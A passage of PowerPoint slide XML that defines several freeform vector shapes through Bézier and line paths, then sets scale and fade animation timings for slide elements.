                    <a:pt x="35" y="2"/>
                    <a:pt x="29" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="14"/>
                    <a:pt x="14" y="20"/>
                    <a:pt x="6" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="4" y="31"/>
                    <a:pt x="8" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="49"/>
                    <a:pt x="35" y="56"/>
                    <a:pt x="40" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="70"/>
                    <a:pt x="43" y="72"/>
                    <a:pt x="44" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="86"/>
                    <a:pt x="57" y="113"/>
                    <a:pt x="65" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="132"/>
                    <a:pt x="82" y="148"/>
                    <a:pt x="93" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="170"/>
                    <a:pt x="77" y="212"/>
                    <a:pt x="97" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="229"/>
                    <a:pt x="72" y="221"/>
                    <a:pt x="67" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="253"/>
                    <a:pt x="34" y="299"/>
                    <a:pt x="56" y="343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="343"/>
                    <a:pt x="49" y="343"/>
                    <a:pt x="46" y="343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="343"/>
                    <a:pt x="22" y="345"/>
                    <a:pt x="22" y="364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="373"/>
                    <a:pt x="33" y="382"/>
                    <a:pt x="39" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="399"/>
                    <a:pt x="61" y="411"/>
                    <a:pt x="72" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="429"/>
                    <a:pt x="118" y="468"/>
                    <a:pt x="162" y="513"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="508"/>
                    <a:pt x="357" y="454"/>
                    <a:pt x="411" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="265"/>
                    <a:pt x="199" y="149"/>
                    <a:pt x="174" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="89"/>
                    <a:pt x="95" y="53"/>
                    <a:pt x="61" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="15"/>
                    <a:pt x="51" y="7"/>
                    <a:pt x="45" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="2"/>
                    <a:pt x="40" y="0"/>
                    <a:pt x="39" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="77498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97" name="Freeform 187">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83B24A5F-33C0-054B-B1AC-EFC501630299}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5365750" y="4500563"/>
              <a:ext cx="134938" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 10 w 85"/>
                <a:gd name="T1" fmla="*/ 72 h 72"/>
                <a:gd name="T2" fmla="*/ 85 w 85"/>
                <a:gd name="T3" fmla="*/ 12 h 72"/>
                <a:gd name="T4" fmla="*/ 76 w 85"/>
                <a:gd name="T5" fmla="*/ 0 h 72"/>
                <a:gd name="T6" fmla="*/ 0 w 85"/>
                <a:gd name="T7" fmla="*/ 61 h 72"/>
                <a:gd name="T8" fmla="*/ 10 w 85"/>
                <a:gd name="T9" fmla="*/ 72 h 72"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="85" h="72">
                  <a:moveTo>
                    <a:pt x="10" y="72"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10"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98" name="Freeform 188">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B3430E6-4FCC-7248-80BA-3F33554E3126}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5461000" y="4538663"/>
              <a:ext cx="55563" cy="58738"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 24 h 37"/>
                <a:gd name="T2" fmla="*/ 17 w 35"/>
                <a:gd name="T3" fmla="*/ 0 h 37"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 15 h 37"/>
                <a:gd name="T6" fmla="*/ 19 w 35"/>
                <a:gd name="T7" fmla="*/ 37 h 37"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 24 h 37"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="35" h="37">
                  <a:moveTo>
                    <a:pt x="35" y="24"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="2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99" name="Freeform 189">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E7C4C7-6CC0-B443-9415-688417D1F9A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5405438" y="4578350"/>
              <a:ext cx="76200" cy="79375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 48"/>
                <a:gd name="T1" fmla="*/ 18 h 50"/>
                <a:gd name="T2" fmla="*/ 27 w 48"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 48 w 48"/>
                <a:gd name="T5" fmla="*/ 34 h 50"/>
                <a:gd name="T6" fmla="*/ 21 w 48"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 0 w 48"/>
                <a:gd name="T9" fmla="*/ 18 h 50"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="48" h="50">
                  <a:moveTo>
                    <a:pt x="0" y="18"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1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100" name="Freeform 190">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3BDFCA-A108-DD48-9C03-812CA0601998}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5170488" y="4375150"/>
              <a:ext cx="111125" cy="112713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 65"/>
                <a:gd name="T1" fmla="*/ 0 h 66"/>
                <a:gd name="T2" fmla="*/ 0 w 65"/>
                <a:gd name="T3" fmla="*/ 33 h 66"/>
                <a:gd name="T4" fmla="*/ 32 w 65"/>
                <a:gd name="T5" fmla="*/ 66 h 66"/>
                <a:gd name="T6" fmla="*/ 65 w 65"/>
                <a:gd name="T7" fmla="*/ 33 h 66"/>
                <a:gd name="T8" fmla="*/ 32 w 65"/>
                <a:gd name="T9" fmla="*/ 0 h 66"/>
                <a:gd name="T10" fmla="*/ 32 w 65"/>
                <a:gd name="T11" fmla="*/ 48 h 66"/>
                <a:gd name="T12" fmla="*/ 17 w 65"/>
                <a:gd name="T13" fmla="*/ 33 h 66"/>
                <a:gd name="T14" fmla="*/ 32 w 65"/>
                <a:gd name="T15" fmla="*/ 18 h 66"/>
                <a:gd name="T16" fmla="*/ 48 w 65"/>
                <a:gd name="T17" fmla="*/ 33 h 66"/>
                <a:gd name="T18" fmla="*/ 32 w 65"/>
                <a:gd name="T19"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66">
                  <a:moveTo>
                    <a:pt x="32" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="14" y="66"/>
                    <a:pt x="32" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="66"/>
                    <a:pt x="65" y="51"/>
                    <a:pt x="65" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="15"/>
                    <a:pt x="50" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="32" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="48"/>
                    <a:pt x="17" y="41"/>
                    <a:pt x="17" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="25"/>
                    <a:pt x="24" y="18"/>
                    <a:pt x="32" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="18"/>
                    <a:pt x="48" y="25"/>
                    <a:pt x="48" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="41"/>
                    <a:pt x="41" y="48"/>
                    <a:pt x="32" y="4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101" name="Freeform 191">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B9774E-FBA4-0741-917E-A9C0E20CBD49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5089525" y="4471988"/>
              <a:ext cx="468313" cy="282575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 263 w 273"/>
                <a:gd name="T1" fmla="*/ 130 h 164"/>
                <a:gd name="T2" fmla="*/ 78 w 273"/>
                <a:gd name="T3" fmla="*/ 130 h 164"/>
                <a:gd name="T4" fmla="*/ 71 w 273"/>
                <a:gd name="T5" fmla="*/ 121 h 164"/>
                <a:gd name="T6" fmla="*/ 58 w 273"/>
                <a:gd name="T7" fmla="*/ 91 h 164"/>
                <a:gd name="T8" fmla="*/ 76 w 273"/>
                <a:gd name="T9" fmla="*/ 18 h 164"/>
                <a:gd name="T10" fmla="*/ 45 w 273"/>
                <a:gd name="T11" fmla="*/ 0 h 164"/>
                <a:gd name="T12" fmla="*/ 26 w 273"/>
                <a:gd name="T13" fmla="*/ 38 h 164"/>
                <a:gd name="T14" fmla="*/ 23 w 273"/>
                <a:gd name="T15" fmla="*/ 99 h 164"/>
                <a:gd name="T16" fmla="*/ 34 w 273"/>
                <a:gd name="T17" fmla="*/ 130 h 164"/>
                <a:gd name="T18" fmla="*/ 12 w 273"/>
                <a:gd name="T19" fmla="*/ 130 h 164"/>
                <a:gd name="T20" fmla="*/ 0 w 273"/>
                <a:gd name="T21" fmla="*/ 140 h 164"/>
                <a:gd name="T22" fmla="*/ 0 w 273"/>
                <a:gd name="T23" fmla="*/ 153 h 164"/>
                <a:gd name="T24" fmla="*/ 12 w 273"/>
                <a:gd name="T25" fmla="*/ 164 h 164"/>
                <a:gd name="T26" fmla="*/ 263 w 273"/>
                <a:gd name="T27" fmla="*/ 164 h 164"/>
                <a:gd name="T28" fmla="*/ 273 w 273"/>
                <a:gd name="T29" fmla="*/ 153 h 164"/>
                <a:gd name="T30" fmla="*/ 273 w 273"/>
                <a:gd name="T31" fmla="*/ 140 h 164"/>
                <a:gd name="T32" fmla="*/ 263 w 273"/>
                <a:gd name="T33" fmla="*/ 13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3" h="164">
                  <a:moveTo>
                    <a:pt x="263" y="130"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="130"/>
                    <a:pt x="78" y="130"/>
                    <a:pt x="78" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="125"/>
                    <a:pt x="73" y="124"/>
                    <a:pt x="71" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="112"/>
                    <a:pt x="61" y="101"/>
                    <a:pt x="58" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="69"/>
                    <a:pt x="60" y="44"/>
                    <a:pt x="76" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="17"/>
                    <a:pt x="52" y="10"/>
                    <a:pt x="45" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="13"/>
                    <a:pt x="30" y="26"/>
                    <a:pt x="26" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="59"/>
                    <a:pt x="18" y="80"/>
                    <a:pt x="23" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="110"/>
                    <a:pt x="29" y="120"/>
                    <a:pt x="34" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="130"/>
                    <a:pt x="12" y="130"/>
                    <a:pt x="12" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="130"/>
                    <a:pt x="0" y="134"/>
                    <a:pt x="0" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="153"/>
                    <a:pt x="0" y="153"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="159"/>
                    <a:pt x="6" y="164"/>
                    <a:pt x="12" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="164"/>
                    <a:pt x="263" y="164"/>
                    <a:pt x="263" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="164"/>
                    <a:pt x="273" y="159"/>
                    <a:pt x="273" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="140"/>
                    <a:pt x="273" y="140"/>
                    <a:pt x="273" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="134"/>
                    <a:pt x="269" y="130"/>
                    <a:pt x="263" y="13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102" name="Freeform 192">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E89ECD1-5BCC-254D-A056-7C22838C8E07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5056188" y="4103688"/>
              <a:ext cx="190500" cy="198438"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 38 w 111"/>
                <a:gd name="T1" fmla="*/ 79 h 116"/>
                <a:gd name="T2" fmla="*/ 37 w 111"/>
                <a:gd name="T3" fmla="*/ 96 h 116"/>
                <a:gd name="T4" fmla="*/ 54 w 111"/>
                <a:gd name="T5" fmla="*/ 116 h 116"/>
                <a:gd name="T6" fmla="*/ 111 w 111"/>
                <a:gd name="T7" fmla="*/ 73 h 116"/>
                <a:gd name="T8" fmla="*/ 93 w 111"/>
                <a:gd name="T9" fmla="*/ 51 h 116"/>
                <a:gd name="T10" fmla="*/ 76 w 111"/>
                <a:gd name="T11" fmla="*/ 47 h 116"/>
                <a:gd name="T12" fmla="*/ 72 w 111"/>
                <a:gd name="T13" fmla="*/ 51 h 116"/>
                <a:gd name="T14" fmla="*/ 39 w 111"/>
                <a:gd name="T15" fmla="*/ 10 h 116"/>
                <a:gd name="T16" fmla="*/ 43 w 111"/>
                <a:gd name="T17" fmla="*/ 6 h 116"/>
                <a:gd name="T18" fmla="*/ 38 w 111"/>
                <a:gd name="T19" fmla="*/ 0 h 116"/>
                <a:gd name="T20" fmla="*/ 0 w 111"/>
                <a:gd name="T21" fmla="*/ 32 h 116"/>
                <a:gd name="T22" fmla="*/ 4 w 111"/>
                <a:gd name="T23" fmla="*/ 37 h 116"/>
                <a:gd name="T24" fmla="*/ 9 w 111"/>
                <a:gd name="T25" fmla="*/ 34 h 116"/>
                <a:gd name="T26" fmla="*/ 42 w 111"/>
                <a:gd name="T27" fmla="*/ 75 h 116"/>
                <a:gd name="T28" fmla="*/ 38 w 111"/>
                <a:gd name="T29" fmla="*/ 7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16">
                  <a:moveTo>
                    <a:pt x="38" y="79"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="82"/>
                    <a:pt x="33" y="90"/>
                    <a:pt x="37" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="116"/>
                    <a:pt x="54" y="116"/>
                    <a:pt x="54" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="73"/>
                    <a:pt x="111" y="73"/>
                    <a:pt x="111" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="51"/>
                    <a:pt x="93" y="51"/>
                    <a:pt x="93" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="45"/>
                    <a:pt x="81" y="44"/>
                    <a:pt x="76" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="51"/>
                    <a:pt x="72" y="51"/>
                    <a:pt x="72" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="10"/>
                    <a:pt x="39" y="10"/>
                    <a:pt x="39" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="6"/>
                    <a:pt x="43" y="6"/>
                    <a:pt x="43" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="0"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="38" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="0" y="32"/>
                    <a:pt x="0" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="37"/>
                    <a:pt x="4" y="37"/>
                    <a:pt x="4" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="34"/>
                    <a:pt x="9" y="34"/>
                    <a:pt x="9" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="75"/>
                    <a:pt x="42" y="75"/>
                    <a:pt x="42" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38" y="7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
          <p:nvSpPr>
            <p:cNvPr id="103" name="Freeform 193">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BB8D546-A0F5-844C-A816-2FF94DF76BD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5167313" y="4252913"/>
              <a:ext cx="304800" cy="331788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 18 w 178"/>
                <a:gd name="T1" fmla="*/ 65 h 193"/>
                <a:gd name="T2" fmla="*/ 34 w 178"/>
                <a:gd name="T3" fmla="*/ 62 h 193"/>
                <a:gd name="T4" fmla="*/ 76 w 178"/>
                <a:gd name="T5" fmla="*/ 104 h 193"/>
                <a:gd name="T6" fmla="*/ 69 w 178"/>
                <a:gd name="T7" fmla="*/ 128 h 193"/>
                <a:gd name="T8" fmla="*/ 122 w 178"/>
                <a:gd name="T9" fmla="*/ 193 h 193"/>
                <a:gd name="T10" fmla="*/ 178 w 178"/>
                <a:gd name="T11" fmla="*/ 148 h 193"/>
                <a:gd name="T12" fmla="*/ 111 w 178"/>
                <a:gd name="T13" fmla="*/ 66 h 193"/>
                <a:gd name="T14" fmla="*/ 85 w 178"/>
                <a:gd name="T15" fmla="*/ 33 h 193"/>
                <a:gd name="T16" fmla="*/ 57 w 178"/>
                <a:gd name="T17" fmla="*/ 0 h 193"/>
                <a:gd name="T18" fmla="*/ 0 w 178"/>
                <a:gd name="T19" fmla="*/ 43 h 193"/>
                <a:gd name="T20" fmla="*/ 18 w 178"/>
                <a:gd name="T21" fmla="*/ 6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8" h="193">
                  <a:moveTo>
                    <a:pt x="18" y="65"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="63"/>
                    <a:pt x="29" y="62"/>
                    <a:pt x="34" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="62"/>
                    <a:pt x="76" y="81"/>
                    <a:pt x="76" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="113"/>
                    <a:pt x="74" y="121"/>
                    <a:pt x="69" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="193"/>
                    <a:pt x="122" y="193"/>
                    <a:pt x="122" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="148"/>
                    <a:pt x="178" y="148"/>
                    <a:pt x="178" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="66"/>
                    <a:pt x="111" y="66"/>
                    <a:pt x="111" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="33"/>
                    <a:pt x="85" y="33"/>
                    <a:pt x="85" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="0"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="43"/>
                    <a:pt x="0" y="43"/>
                    <a:pt x="0" y="43"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18" y="6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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3263105613"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="1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250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="6" presetClass="emph" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="110000" y="110000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="12" presetID="6" presetClass="emph" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="400"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="91000" y="91000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="6" presetClass="emph" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="400"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
